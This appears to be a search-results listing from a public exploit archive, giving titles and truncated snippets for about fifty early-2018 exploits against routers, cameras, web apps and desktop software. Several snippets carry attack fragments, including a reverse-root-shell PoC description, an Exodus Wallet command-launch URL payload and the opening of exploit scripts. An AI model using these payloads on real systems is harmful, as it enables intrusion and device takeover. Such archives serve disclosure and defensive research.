41207 matches found
Oracle Hospitality Simphony (MICROS) 2.7 2.9 - Directory Traversal
Oracle Hospitality Simphony MICROS 2.7 2.9 - Directory Traversal Exploit Title: Oracle Hospitality Simphony MICROS directory traversal Date: 30.01.2018 Exploit Author: Dmitry Chastuhin https://twitter.com/chipik Vendor Homepage: http://www.oracle.com/ Version: 2.7, 2.8 and 2.9 Tested on: Win, nix...
Geovision Inc. IP CameraVideoAccess Control - Multiple Remote Command Execution Stack Overflow Double Free Unauthorized Access
Geovision Inc. IP CameraVideoAccess Control - Multiple Remote Command Execution Stack Overflow Double Free Unauthorized Access STX Subject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access Attack vector:...
WebKit - detachWrapper Use-After-Free
WebKit - detachWrapper Use-After-Free ::detachWrapper /Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:...
WebKit - WebCore::FrameView::clientToLayoutViewportPoint Use-After-Free
WebKit - WebCore::FrameView::clientToLayoutViewportPoint Use-After-Free function jsfuzzer var b = document.createElement"body"; a.appendb; ta.autofocus = true; var iframe = document.createElement"iframe"; b.appendChildiframe; li.appendChilddd; iframe.contentDocument.caretRangeFromPoint; function...
Geovision Inc. IP Camera Video - Remote Command Execution
Geovision Inc. IP Camera Video - Remote Command Execution !/usr/bin/env python2.7 SOF Geovision Inc. IP Camera & Video Server Remote Command Execution PoC Researcher: bashis November 2017 1. Pop stunnel TLSv1 reverse root shell Local listener: 'ncat -vlp --ssl'; Verified w/ v7.60 2. Dump all...
Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)
Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow SEH Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Date: 29/01/2018 Exploit Author: Daniel Teixeira Vendor Homepage: http://www.syncbreeze.com Software Link:...
System Shield 5.0.0.136 - Privilege Escalation
System Shield 5.0.0.136 - Privilege Escalation / Exploit Title - System Shield AntiVirus & AntiSpyware Arbitrary Write Privilege Escalation Date - 29th January 2018 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.iolo.com/ Tested Version - 5.0.0.136 Driver Version - 5.4.11.1 ...
HPE iMC 7.3 - RMI Java Deserialization
HPE iMC 7.3 - RMI Java Deserialization Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability Date: 01-28-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.hpe.com Software Link:...
Advantech WebAccess 8.3 - SQL Injection
Advantech WebAccess 8.3 - SQL Injection !/usr/bin/python2.7 Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability Date: 01-13-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.advantech.com Software Link:...
Joomla! Component Visual Calendar 3.1.3 - id SQL Injection
Joomla! Component Visual Calendar 3.1.3 - id SQL Injection Exploit Title: Joomla! Component Visual Calendar 3.1.3 - SQL Injection Dork: N/A Date: 30.01.2018 Vendor Homepage: http://www.joomlacalendars.com/ Software Link:...
BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure
BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure Exploit Title: BMC BladeLogic RSCD agent get Windows users Filename: BMCwinUsers.py Github: https://github.com/bao7uo/bmcbladelogic Date: 2018-01-27 Exploit Author: Paul Taylor / Foregenix Ltd Website: http://www.foregenix.com/blog...
Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal
Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal Exploit Title: Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal Dork: N/A Date: 30.01.2018 Vendor Homepage: http://www.joomlacalendars.com/ Software Link:...
Hotspot Shield - Information Disclosure
Hotspot Shield - Information Disclosure Vulnerability Summary The following advisory describes a information disclosure found in Hotspot Shield. Hotspot Shield “provides secure and private access to a free and open internet. Enabling access to social networks, sports, audio and video streaming,...
LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow
LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow !/usr/bin/python Exploit Author: Miguel Mendez Z Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow Date: 29-01-2018 Software: LabF nfsAxe Version: v3.7 Vendor Homepage: http://www.labf.com Software Link:...
Joomla! Component CP Event Calendar 3.0.1 - id SQL Injection
Joomla! Component CP Event Calendar 3.0.1 - id SQL Injection Exploit Title: Joomla! Component CP Event Calendar 3.0.1 - SQL Injection Dork: N/A Date: 30.01.2018 Vendor Homepage: http://www.joomlacalendars.com/ Software Link:...
macOS - sysctl_vfs_generic_conf Stack Leak Through Struct Padding
macOS - sysctlvfsgenericconf Stack Leak Through Struct Padding / The sysctls vfs.generic.conf. are handled by sysctlvfsgenericconf, which is implemented as follows: static int sysctlvfsgenericconf SYSCTLHANDLERARGS int name, namelen; struct vfstable vfsp; struct vfsconf vfsc; voidoidp; name = arg...
iBall WRA150N - Multiple Vulnerabilities
iBall WRA150N - Multiple Vulnerabilities Vulnerabilities summary The following advisory describes two 2 vulnerabilities found in iB-WRA150N devices, firmware 1.2.6 build 110401 Rel.47776n. iB-WRA150N is “a powerful solution to Internet connectivity at home, small offices and work stations. The ke...
Arq 5.10 - Local Privilege Escalation (1)
Arq 5.10 - Local Privilege Escalation 1 !/usr/bin/env ruby Arq USE AT YOUR OWN RISK - THIS WILL OVERWRITE THE ROOT USER'S CRONTAB! $binarytarget = "/tmp/arq510exp" class Arq510...
Arq 5.10 - Local Privilege Escalation (2)
Arq 5.10 - Local Privilege Escalation 2 !/bin/bash Arq payload.sh EOF !/bin/bash rm -rf $HOME/.arq510privescexp while : do pid=\ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \ |cut -d ' ' -f2\ if "$pid" != "" ; then kill -9 $pid...
systemd (systemd-tmpfiles) 236 - fs.protected_hardlinks0 Local Privilege Escalation
systemd systemd-tmpfiles 236 - fs.protectedhardlinks0 Local Privilege Escalation Product: systemd systemd-tmpfiles Versions-affected: 236 and earlier Author: Michael Orlitzky Fixed-in: commit 5579f85 , version 237 Bug-report: https://github.com/systemd/systemd/issues/7736 Acknowledgments: Lennart...
Artifex MuJS 1.0.2 - Integer Overflow
Artifex MuJS 1.0.2 - Integer Overflow Exploit Title: DoS caused by the interactive call between two functions Date: 2018-01-16 Exploit Author: Andrea Sindoni - @invictus1306 Vendor: Artifex https://www.artifex.com/ Software Link: https://github.com/ccxvii/mujs Version: Mujs -...
Artifex MuJS 1.0.2 - Denial of Service
Artifex MuJS 1.0.2 - Denial of Service Hello, I want to submit the following bug: The jsstrtod function in jsdtoa.c in Artifex MuJS through 1.0.2 has an integer overflow because of incorrect exponent validation. Exploit Title: Integer signedness error leading to Out-of-bounds read that causes cra...
Trend Micro Threat Discovery Appliance 2.6.1062r1 - dlp_policy_upload.cgi Remote Code Execution
Trend Micro Threat Discovery Appliance 2.6.1062r1 - dlppolicyupload.cgi Remote Code Execution !/usr/local/bin/python """ Trend Micro Threat Discovery Appliance /opt/TrendMicro/MinorityReport/bin/ Then, all we do is create /engptnstores/prod/sensorSDK/data/si/dlpkill.sh with malicious code and get...
PACSOne Server 6.6.2 DICOM Web Viewer - Directory Trasversal
PACSOne Server 6.6.2 DICOM Web Viewer - Directory Trasversal Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal / Local File Inclusion Date: 08/14/2017 Software Link: http://www.pacsone.net/download.htm Google Dork: inurl:pacs/login.php inurl:pacsone/login.php inurl:pacsone...
Task Rabbit Clone 1.0 - id SQL Injection
Task Rabbit Clone 1.0 - id SQL Injection Exploit Title: Task Rabbit Clone 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://migrateshop.com/ Software Link: http://migrateshop.com/product/task-rabbit-clone-php-script/ Version: 1.0 Category: Webapps Tested on:...
Hot Scripts Clone - subctid SQL Injection
Hot Scripts Clone - subctid SQL Injection Exploit Title: Hot Scripts Clone Script 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/product/M72g4502563/php-scripts/hot-scripts-clone-:-script-classified...
Netis WF2419 Router - Cross-Site Request Forgery
Netis WF2419 Router - Cross-Site Request Forgery Exploit Title: Netis-WF2419 Router Cross-Site Request Forgery CSRF Date: 28/01/2018 Exploit Author: Sajibe Kanti Author Contact: https://twitter.com/@sajibekantibd Vendor Homepage: http://www.netis-systems.com/ Version: Netis-WF2419, V2.2.36123...
PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection
PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer SQL Injection Date: 08/14/2017 Software Link: http://www.pacsone.net/download.htm Version: PACSOne Server 6.6.2 Exploit Author: Carlos Avila Google Dork: inurl:pacs/login.php...
Multilanguage Real Estate MLM Script 3.0 - srch SQL Injection
Multilanguage Real Estate MLM Script 3.0 - srch SQL Injection Exploit Title: Multilanguage Real Estate MLM Script = 3.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.phpscriptsmall.com/ Software Link:...
Gnew 2018.1 - Cross-Site Request Forgery
Gnew 2018.1 - Cross-Site Request Forgery Exploit Title: Gnew 2018.1 - Cross-Site Request Forgery Date: 26/01/2018 Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT Vendor website : http://gnew.xyz/ Software download : http://www.gnew.xyz/pages/download.php Version: 2018.1 Tested on: Windows 10 Hom...
Nexpose 6.4.66 - Cross-Site Request Forgery
Nexpose 6.4.66 - Cross-Site Request Forgery Exploit Title: Cross Site Request Forgery at Nexpose Automated Actions Release Date: 2017-12-13 Exploit Author: Shwetabh Vishnoi Link: https://www.linkedin.com/in/shwetabhvishnoi Vendor Homepage: https://www.rapid7.com/ Software Link:...
Buddy Zone 2.9.9 - SQL Injection
Buddy Zone 2.9.9 - SQL Injection Exploit Title: Vastal I-Tech Facebook Clone 2.9.9 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://vastal.com/ Software Link: http://vastal.com/buddy-zone-social-networking-script.html Version: 2.9.9 Category: Webapps Tested on:...
Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery
Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery CODE input...
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download Exploit Title: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download Dork: N/A Date: 27.01.2018 Vendor Homepage: https://joomlatag.com/ Software Link:...
Sony Playstation 3 (PS3) 4.82 - Jailbreak (ROP)
Sony Playstation 3 PS3 4.82 - Jailbreak ROP EDB Note http://ps3xploit.com/help/dumper.html EDB Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44820.zip Dumper Help Warning: Due to the lack of proper checks after exiting the ROP chain, it is possible in...
TSiteBuilder 1.0 - SQL Injection
TSiteBuilder 1.0 - SQL Injection Exploit Title: TSiteBuilder 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.datacomponents.net/ Software Link: http://www.datacomponents.net/products/website/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploi...
KeystoneJS 4.0.0-beta.7 - Cross-Site Request Forgery
KeystoneJS 4.0.0-beta.7 - Cross-Site Request Forgery Exploit Title: Application wide CSRF Bypass Date: Sep, 2017 Exploit Author: Saurabh Banawar Vendor Homepage: http://keystonejs.com/ Software Link: https://github.com/keystonejs/keystone Version: 4.0.0 Tested on: Windows 8.1 CVE : 2017-16570 Lin...
Werkzeug - Debug Shell Command Execution
Werkzeug - Debug Shell Command Execution !/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' %...
BMC BladeLogic 8.3.00.64 - Remote Command Execution
BMC BladeLogic 8.3.00.64 - Remote Command Execution Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version Filename: BMCrexec.py Github: https://github.com/bao7uo/bmcbladelogic Date: 2018-01-24 Exploit Author: Paul Taylor / Foregenix Ltd Website: http://www.foregenix.com/blog...
WordPress Plugin Learning Management System - course_id SQL Injection
WordPress Plugin Learning Management System - courseid SQL Injection Exploit Title: Good LMS - Learning Management System WP Plugin SQL Injection Date: 2018-01-24 Exploit Author: Esecurity.ir Exploit Author Web Site: http://esecurity.ir Special Thanks : Meisam Monsef [email protected] - Telegra...
Dodocool DC38 N300 - Cross-site Request Forgery
Dodocool DC38 N300 - Cross-site Request Forgery Exploit Title: DODOCOOL DC38 N300 Cross-site Request Forgery Date: 17-01-2018 Exploit Authors: Raffaele Sabato Contact: https://twitter.com/syrion89 Vendor: DODOCOOL Vendor Homepage: www.dodocool.com Version: RTN2-AW.GD.R3465.1.20161103 CVE:...
Exodus Wallet (ElectronJS Framework) - Remote Code Execution
Exodus Wallet ElectronJS Framework - Remote Code Execution window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='...
ASUS DSL-N14U B1 Router 1.1.2.3_345 - Change Administrator Password
ASUS DSL-N14U B1 Router 1.1.2.3345 - Change Administrator Password import requests import sys import urllib3 ip = sys.argv1 user = sys.argv2 newPassword = sys.argv3 requests.packages.urilib3.disablewarnings urllib3.disablewarningsurllib3.exceptions.InsecureRequestWarning data = "groupid": '',...
WordPress Plugin Email Subscribers Newsletters 3.4.7 - Information Disclosure
WordPress Plugin Email Subscribers Newsletters 3.4.7 - Information Disclosure Exploit Title: WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure Google Dork: Date: 2018-01-23 Exploit Author: ThreatPress Security Vendor Homepage: http://icegram.com/ Software Link:...
Oracle VirtualBox 5.1.30 5.2-rc1 - Guest to Host Escape
Oracle VirtualBox 5.1.30 5.2-rc1 - Guest to Host Escape SSD Advisory – Oracle VirtualBox Multiple Guest to Host Escape Vulnerabilities Source: https://blogs.securiteam.com/index.php/archives/3649 Vulnerabilities summary The following advisory describes two 2 guest to host escape found in Oracle...
Professional Local Directory Script 1.0 - SQL Injection
Professional Local Directory Script 1.0 - SQL Injection Exploit Title: Professional Local Directory Script 1.0 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://www.eihitech.com/ Software Link: http://www.eihitech.com/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...
RAVPower 2.000.056 - Root Remote Code Execution
RAVPower 2.000.056 - Root Remote Code Execution """ Exploit Title: RAVPower - remote root Date: 23/01/2018 Exploit Authors: Daniele Linguaglossa Vendor Homepage: https://www.ravpower.com/ Software Link: https://www.ravpower.com/ Version: 2.000.056 Tested on: OSX CVE : CVE-2018-5997 """ import...
Telerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Arbitrary File Upload
Telerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Arbitrary File Upload Exploit Title: Telerik UI for ASP.NET AJAX RadAsyncUpload uploader Filename: RAUcrypto.py Github: https://github.com/bao7uo/RAUcrypto Date: 2018-01-23 Exploit Author: Paul Taylor / Foregenix Ltd Website:...
Telerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Encryption Keys Disclosure
Telerik UI for ASP.NET AJAX 2012.3.1308 2017.1.118 - Encryption Keys Disclosure Exploit Title: Telerik UI for ASP.NET AJAX DialogHandler Dialog cracker Filename: dpcrypto.py Github: https://github.com/bao7uo/dpcrypto Date: 2018-01-23 Exploit Author: Paul Taylor / Foregenix Ltd Website:...
Wchat 1.5 - SQL Injection
Wchat 1.5 - SQL Injection Exploit Title: Wchat - Fully Responsive PHP AJAX Chat Script 1.5 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://bylancer.com/ Software Link: https://codecanyon.net/item/wchat-fully-responsive-phpajax-chat/18047319 Version: 1.5 Category: Webapps Tested...